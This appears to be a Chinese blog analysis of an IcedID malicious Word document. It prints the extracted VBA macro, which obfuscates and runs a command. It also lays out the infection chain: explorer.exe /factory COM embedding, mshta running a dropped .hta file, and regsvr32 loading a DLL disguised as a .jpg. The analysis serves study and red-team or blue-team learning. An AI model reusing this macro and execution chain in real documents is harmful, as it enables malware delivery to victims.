IcedID恶意文档钓鱼手法剖析
析
利用oletools静态分析,提取宏代码,如图:

Function contents()
With ActiveDocument.Content.Find
loveDoor = .Execute(FindText:="%1", ReplaceWith:="", Replace:=2)
End With
End Function
Function text1(powGirlLoad)
text1 = ActiveDocument.BuiltInDocumentProperties(powGirlLoad).Value
contents
End Function
Public Function s(dowGirlLoad, tubeGirlPow)
GetObject("", text1("category")).exec StrReverse(" rerolpxe\swodniw\:c") + tubeGirlPow
End Function
注:oletools详细使用教程请转
文档内容肉眼看上去是空白的,但是全选拖出来如下:

通过宏代码处理文档内容,得到hta文件:

另启动一个 Explorer.exe(防止崩溃影响程序活动)后台隐藏插入com功能组件,方便dll执行的同时调用mshta.exe执行hta文件
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding //有无逗号,区别很好,自行测试
"C:\Windows\System32\mshta.exe" C:\Users\admin\Documents\karolYouYou.hta

下载含payload的jpg文件(实质上是dll文件),执行payload
"C:\Windows\System32\regsvr32.exe" c:\users\public\youYou.jpg


样本:
https://app.any.run/tasks/add39d8b-342c-4e55-9b37-3e3379fce030/
参考资料:
https://zeronohacker.com/398.html
https://www.cnblogs.com/liaocheng/p/4506406.html
https://www.cnblogs.com/yx-zs/p/14338291.html
https://zho.bizadcharityrun.com/434451-explorer-exe-starts-every-five-WQFOTF-article
https://blog.csdn.net/userpass_word/article/details/84307126
https://blog.csdn.net/weixin_44493841/article/details/106645360
ps:萌新分析APT攻击手法,用于自身钓鱼作业,请大佬轻喷,欢迎各位蓝队交流指点 QAQ
IcedID恶意文档钓鱼手法剖析的更多相关文章
- 接口文档API、剖析http协议, 原生http请求函数
http协议:超广本传输协议 特点: 短连接 请求完成后就断开 无状态 对于事务处理无记忆能力 媒体独立 客户端要指定适合的传输内容类型,如json http 是建立在tcp/ip协议之上的应用层 ...
- epub-2格式电子书剖析之一:文档构成
epub格式电子书遵循IDPF推出的OCF规范,OCF规范遵循ZIP压缩技术,即epub电子书本身就是一个ZIP文件,我们将epub格式电子书的后缀.epub修改为.zip后,可以通过解压缩软件(例如 ...
- 恶意PDF文档分析记录
0x1 PDF是什么 PDF(便携式文件格式,Portable Document Format)是由Adobe Systems在1993年用於文件交换所发展出的文件格式. 因为PDF的文件格式性质广泛 ...
- HTML5实战与剖析之跨文档消息传递(iframe传递信息)
在来自不同域名的页面间传递消息一般统称为跨文档消息传送,简称XDM.如,www.leemagnum.com域中的页面与位于一个内嵌框架中的http://blog.csdn.net/lee_magnum ...
- [转载]中情局数千份机密文档泄露:各种0day工具、恶意程序应有尽有
转载:http://www.freebuf.com/news/128802.html 维基解密最近再度获取到了数千份文件——据说这些文件是来自CIA(中央情报局),文件细数了CIA所用的网络入侵工具及 ...
- SpingMVC 核心技术帮助文档
声明:本篇文档主要是用于参考帮助文档,没有实例,但几乎包含了SpringMVC 4.2版本的所有核心技术,当前最新版本是4.3,4.2的版本已经经是很新的了,所以非常值得大家一读,对于读完这篇文档感觉 ...
- 网络电视精灵~分析~~~~~~简单工厂模式,继承和多态,解析XML文档,视频项目
小总结: 所用技术: 01.C/S架构,数据存储在XML文件中 02.简单工厂模式 03.继承和多态 04.解析XML文档技术 05.深入剖析内存中数据的走向 06.TreeView控件的使用 核心: ...
- Markdown: 用写代码的思维写文档
作者:吴香伟 发表于 2014/08/07 版权声明:可以任意转载,转载时务必以超链接形式标明文章原始出处和作者信息以及版权声明 本文不讲解Markdown的语法规则,只关注它带来的好处以及我使用的方 ...
- HTML5的文档结构和新增标签
一.HTML5 文档结构1.第一步:打开 开发工具,打开指定文件夹:2.第二步:保存 index.html 文件到磁盘中,.html 是网页后缀:3.第三步:开始编写 HTML5 的基本格式.< ...
- javascrit2.0完全参考手册(第二版) 第1章第1节 在XHTML文档中增加javascript
通常,向文档中增加script脚本使用<script>元素,在HTML中增加脚本的方式有4中: (1)放到<script></script>块中: (2)<s ...
随机推荐
- Visual Studio 2022 不支持 .NET Framework 4.5 项目的解决办法
概述 升级到Visual Studio 2022后,打开速度快了很多,开发体验也舒服很多.只是使用过程中遇到了一个比较尴尬的问题:默认Visual Studio 2022 不再支持安装 .NET F ...
- CentOS 的 YUM安装时卡死解决方案
YUM是基于RPM的软件包管理器 YUM is an RPM-based package manager 补充说明 Supplementary note yum命令 是在Fedora和RedHat以及 ...
- 全网最详细中英文ChatGPT-GPT-4示例文档-智能聊天机器人从0到1快速入门——官网推荐的48种最佳应用场景(附python/node.js/curl命令源代码,小白也能学)
目录 Introduce 简介 setting 设置 Prompt 提示 Sample response 回复样本 API request 接口请求 python接口请求示例 node.js接口请求示 ...
- openwrt开发使用-arping
前言 IP冲突引起的网络异常,可以通过检查IP是否冲突,排除故障.我们可以用一些工具进行检查,例如arp-scan.arping软件进行查看. 这里使用arping进行检查设备的MAC地址,通过查查看 ...
- Docker容器网络(基本网络模型)
解析Docker的4种容器网络 默认网络模型 先介绍默认的网络模型: 安装docker后,输入ifconfig就会发现多了网卡中多了一个docker0: $ ifconfig docker0: fla ...
- 使用Jmeter进行CPU、内存等监控
一.需要的准备 1.jp@gc - PerfMon Metrics Collector插件(安装方法就不过多介绍啦!) 2.ServerAgent服务器(下载:https://github.com/u ...
- MQTT-保留消息和遗嘱消息
保留消息 为什么需要保留消息 如果不考虑持久会话的因素,那么MQTT订阅只有在客户端连接之后才能创建,所以服务端不能提前预知某个主题会被哪些服务端订阅或者某个客户端会订阅哪些主题,所以当消息到达服 ...
- IDEA中GIT提交后,发现提交有误想修改提交
问题描述:在IDEA开发工具中,使用GIT提交本地后,在push时发现有问题,想要修改提交的内容. 步骤 一:打开version control,点击log 二:找到提交记录,右键点击Undo com ...
- 2022-10-11:一个整数区间 [a, b] ( a < b ) 代表着从 a 到 b 的所有连续整数,包括 a 和 b。 给你一组整数区间intervals,请找到一个最小的集合 S, 使得
2022-10-11:一个整数区间 [a, b] ( a < b ) 代表着从 a 到 b 的所有连续整数,包括 a 和 b. 给你一组整数区间intervals,请找到一个最小的集合 S, 使 ...
- 2020-10-25:go中channel的close流程是什么?
福哥答案2020-10-25: